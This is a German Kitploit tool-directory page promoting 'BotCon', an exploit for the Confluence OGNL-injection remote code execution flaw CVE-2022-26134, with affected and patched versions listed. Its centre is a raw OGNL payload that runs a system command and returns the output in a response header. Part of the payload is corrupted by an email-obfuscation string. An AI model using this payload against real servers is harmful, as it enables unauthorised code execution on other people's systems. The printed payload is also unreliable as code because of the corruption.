Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
BotCon — [CVE-2022-26134] Attlasian Confluence RCE | Kitploit
Tools/GitHubGitHub/keepwannabe/botcon
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubkeepwannabe/botcon

BotCon

[CVE-2022-26134] Attlasian Confluence RCE

Repository anzeigen
31vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

BotCon

Attlasian Confluence – Nicht authentifizierte Remotecodeausführung via OGNL-Injection (CVE-2022-26134)

  • Am 2. Juni 2022 veröffentlichte Atlassian ein Sicherheitsbulletin für seine Confluence Server und Data Center Anwendungen, das eine kritische Schwachstelle zur nicht authentifizierten Remotecodeausführung hervorhebt. Die OGNL-Injection-Schwachstelle ermöglicht es einem nicht authentifizierten Benutzer, beliebigen Code auf einer Confluence Server- oder Data Center-Instanz auszuführen.

LESEN SIE DIES !

Mit Vorsicht verwenden. Sie sind für Ihre Handlungen verantwortlich. Die Entwickler übernehmen keine Haftung und sind nicht verantwortlich für Missbrauch oder Schäden.

BurpRequest

RAW Payload

${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

Fehlerdetails

  • Betroffenes Produkt :

    • Confluence
      • Confluence Server
      • Confluence Data Center
  • Betroffene Versionen :

    • Alle unterstützten Versionen von Confluence Server und Data Center sind betroffen.
    • Confluence Server und Data Center Versionen nach 1.3.0 sind betroffen.

Gegenmaßnahmen

  • Aktualisieren Sie Ihre Attlasian Confluence-Version auf diese reparierten Versionen:
    • 7.4.17
    • 7.13.7
    • 7.14.3
    • 7.15.2
    • 7.16.4
    • 7.17.4
    • 7.18.1
Tool herunterladen